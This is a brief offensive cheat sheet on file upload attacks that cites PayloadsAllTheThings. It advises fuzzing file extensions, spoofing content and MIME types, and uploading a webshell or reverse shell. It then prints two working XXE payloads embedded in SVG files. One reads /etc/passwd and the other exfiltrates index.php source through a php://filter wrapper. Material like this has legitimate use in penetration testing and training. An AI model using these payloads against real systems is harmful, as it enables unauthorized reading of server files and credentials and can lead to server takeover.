File upload attacks

• payloadallthethings

Tips

• Fuzz file extensions for whitelisted and blacklisted, try uncommon extensions
• Change content type when uploading
• Change MIME type when uploading
• Upload webshell or reverse shell

Extension wordlists

• web extensions
• php extensions

XXE with SVG

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>